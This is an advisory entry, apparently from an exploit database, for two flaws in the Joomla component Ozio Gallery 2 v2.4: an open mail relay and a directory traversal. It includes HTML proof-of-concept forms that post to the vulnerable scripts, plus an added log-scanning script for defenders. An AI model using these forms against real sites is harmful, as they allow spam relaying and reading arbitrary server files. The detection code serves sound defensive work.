Vendor: Ozio Gallery 2
By: jdc
CVSS: 7.5 (HIGH)
Title: Open Mail Relay and Directory Traversal
CWE: 502, 22
Product Name: Ozio Gallery 2
Affected Version From: 2.4
Affected Version To: 2.4
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP5, MySQL5
Year: 2010

Joomla Component Ozio Gallery 2 Multiple Vulnerabilities

The Ozio Gallery 2 component for Joomla contains two vulnerabilities: an open mail relay and a directory traversal. The open mail relay lets an attacker send email to any address from the vulnerable server. The directory traversal lets an attacker read and create thumbnails of any file on the server.

Mitigation:

Update to the latest version of the Ozio Gallery 2 component for Joomla.

Exploit-DB raw data:

<!--
# Exploit Title: Joomla Component Ozio Gallery 2 Multiple Vulnerabilities
# Date: 28 May 2010
# Author: jdc
# Software Link: http://extensions.joomla.org/extensions/photos-a-images/photo-flash-gallery/4883
# Version: 2.4
# Tested on: PHP5, MySQL5
-->

<h2>Ozio Gallery 2</h2>
<h3>v 2.4</h3>

<h4>Open Mail Relay:</h4>

<form method="post" action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/sendMail.php">
<label for="to">To:</label><input id="to" name="to" type="text" /><br />
<label for="from">From:</label><input id="from" name="from" type="text" /><br />
<label for="subject">Subject:</label><input id="subject" name="subject" type="text" /><br />
<label for="message">Message:</label><textarea id="message" name="message"></textarea><br />
<input type="submit" value="Send"/>
</form>


<h4>Directory Traversal:</h4>

<form method="post" action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/readAndCreateThumbs.php">
<label for="path">path:</label><input id="path" name="path" type="text" /><br />
<input type="submit" value="Send"/>
</form>
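
A defender-side check, added here as an example and not part of the original advisory or exploit entry: it scans web server access logs for requests to the two script paths that appear in the forms above and groups them by client address. The "combined" log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Script paths taken from the advisory's two forms; matched case-insensitively.
BASE = "/components/com_oziogallery2/imagin/scripts_ralcr/"
FLAGGED = {
    (BASE + "others/sendMail.php").lower(): "open mail relay",
    (BASE + "filesystem/readAndCreateThumbs.php").lower(): "directory traversal",
}

# Apache/nginx "combined" access log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def normalise(target):
    """Drop the query string, decode %xx, collapse // and dot segments."""
    path = unquote(target.split("?", 1)[0])
    return posixpath.normpath("/" + path.lstrip("/")).lower()

def scan(lines):
    """Return {client_ip: [(timestamp, method, issue, status), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        issue = FLAGGED.get(normalise(m["target"]))
        if issue:
            hits[m["ip"]].append((m["ts"], m["method"], issue, int(m["status"])))
    return dict(hits)

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/May/2010:10:01:02 +0000] "POST ' + BASE + 'others/sendMail.php HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.7 - - [28/May/2010:10:01:09 +0000] "POST /components//com_oziogallery2/imagin/scripts_ralcr/filesystem/readAndCreateThumbs%2Ephp?x=1 HTTP/1.1" 200 431 "-" "-"',
    '198.51.100.4 - - [28/May/2010:10:02:00 +0000] "GET /index.php?option=com_oziogallery2 HTTP/1.1" 200 9876 "-" "-"',
    '192.0.2.9 - - [28/May/2010:10:03:00 +0000] "POST ' + BASE + 'others/sendMail.php HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for ip, events in scan(SAMPLE_LOG).items():
        for ts, method, issue, status in events:
            print(f"{ip} [{ts}] {method} -> {issue} endpoint (HTTP {status})")
```

A 200 status on either path means the script is present and answering direct requests; a 404 suggests probing of a host where the component is absent or already updated.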